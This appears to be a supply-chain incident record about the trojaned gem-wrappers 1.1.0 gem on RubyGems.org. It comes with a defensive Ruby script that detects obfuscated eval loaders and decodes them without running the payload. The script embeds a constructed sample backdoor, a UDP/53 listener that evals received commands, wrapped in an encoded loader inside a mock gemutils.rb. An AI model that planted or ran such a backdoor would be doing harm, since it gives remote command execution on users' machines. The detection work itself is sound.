gem-wrappers
gem-wrappers gem backdoored during RubyGems.org platform compromise
During a platform-level compromise of RubyGems.org, in which attackers exploited server vulnerabilities to gain root filesystem access, the legitimate 'gem-wrappers' gem file (v1.1.0) was replaced with a trojaned copy. The malicious code was inserted into 'gemutils.rb' and hidden behind an eval(Zlib::Inflate.inflate(Base64.decode64(...))) loader, which unpacked and executed the backdoor at load time. The backdoor listened on UDP port 53, accepted clear text commands, and executed them via eval(), giving remote command execution on any system that installed or updated to the compromised gem during the incident window.
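As an added illustration (not code from this record, from the gem-wrappers project, or from the incident's artifacts), the following Ruby script shows the checks a practitioner would run over an unpacked gem: flag files carrying the eval(Zlib::Inflate.inflate(Base64.decode64(...))) loader, recover the hidden stage as text without executing it, apply a heuristic for a network-listener-plus-eval backdoor on the decoded stage, and compare a fetched artifact's SHA-256 against an expected digest. The file paths, file contents and the decoded payload are constructed for the example and only mimic the behaviour the record describes; the real gemutils.rb contents are not reproduced.

```ruby
require 'base64'
require 'zlib'
require 'digest'

# Loader shape described in the incident record: the payload is base64-decoded
# and inflated at load time, then handed straight to eval.
OBFUSCATED_LOADER = /eval\s*\(?\s*Zlib::Inflate\.inflate\s*\(\s*Base64\.decode64\s*\(/

# Constructed stand-in for the decoded stage: a UDP/53 listener that evals what it
# receives. It is only ever handled as text here and is never executed.
SAMPLE_PAYLOAD = <<~RUBY
  require 'socket'
  s = UDPSocket.new
  s.bind('0.0.0.0', 53)
  loop { cmd, _addr = s.recvfrom(4096); eval(cmd) }
RUBY
ENCODED = Base64.strict_encode64(Zlib::Deflate.deflate(SAMPLE_PAYLOAD))

# Constructed unpacked-gem file set (paths and contents are hypothetical).
SAMPLE_FILES = {
  'lib/gem-wrappers/version.rb'  => "module GemWrappers\n  VERSION = '1.1.0'\nend\n",
  'lib/gem-wrappers/gemutils.rb' => "require 'zlib'\nrequire 'base64'\n" \
                                    "eval(Zlib::Inflate.inflate(Base64.decode64(\"#{ENCODED}\")))\n",
}

# Step 1: which files carry the obfuscated loader?
def find_obfuscated_loaders(files)
  files.select { |_path, src| src.match?(OBFUSCATED_LOADER) }.keys
end

# Step 2: recover the hidden stage for reading. The base64 literal is pulled out
# with a regex and inflated; nothing is eval'd.
def decode_loader_payloads(src)
  src.scan(/Base64\.decode64\s*\(\s*["']([A-Za-z0-9+\/=\s]+)["']\s*\)/).map do |(b64)|
    Zlib::Inflate.inflate(Base64.decode64(b64))
  end
end

# Step 3: heuristic on the decoded stage. A socket listener plus eval in one blob
# is the shape of the command-execution backdoor the record describes.
def network_eval_backdoor?(src)
  src.match?(/UDPSocket|TCPSocket|TCPServer/) && src.match?(/\beval\s*\(?/)
end

# Step 4: compare the artifact you actually fetched with a known digest.
# Accepts either a bare hex digest or the "sha256:<hex>" form used in the record.
def sha256_matches?(bytes, expected)
  Digest::SHA256.hexdigest(bytes) == expected.sub(/\Asha256:/, '').downcase
end

# Ties the steps together for a map of path => source text.
def audit_gem_files(files)
  find_obfuscated_loaders(files).map do |path|
    stages = decode_loader_payloads(files[path])
    { path: path, stages: stages.size, backdoor: stages.any? { |s| network_eval_backdoor?(s) } }
  end
end

if __FILE__ == $PROGRAM_NAME
  audit_gem_files(SAMPLE_FILES).each do |r|
    puts "#{r[:path]}: #{r[:stages]} hidden stage(s), backdoor heuristic=#{r[:backdoor]}"
  end
end
```

To run it against a real download, unpack with `gem unpack <file>.gem`, read each file under the unpacked directory into the hash that `audit_gem_files` takes, and pass the raw `.gem` bytes to `sha256_matches?` with the digest you trust. Decoding rather than evaluating the hidden stage is the point: the loader pattern is itself the indicator, and the payload only needs to be read.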
- Date
- 2013-01-29 to 2013-02-01
- Category
- Open Source
- Target Surface
- Package registry
- Insertion Phase
- distribution
- Impact
- Backdoor
- Cause
- Compromised Infrastructure
What Was Affected
Package
gem-wrappers
Language
Ruby
Component
Library
Artifact type
source archive
Domain type
package host
Domain
rubygems.org
Repository
github.com/rvm/gem-wrappers
Compromised Versions
1.1.0
Incident Context
- Motive
- Unauthorized Access/Control
- Attribution
- Individual Hacker
- Transitive
- No
- Observed Duration
- 3 days
Evidence
Compromised Artifacts
Current Artifacts and Analysis
Indicators and Changes
Hashes
sha256:fbcf2be93426cbf4f1b2f03b7ac3a8fc85eedd6a8dd42b2f6355c388fed8e00e
Source Data
Source record: oss/gem-wrappers/meta.yaml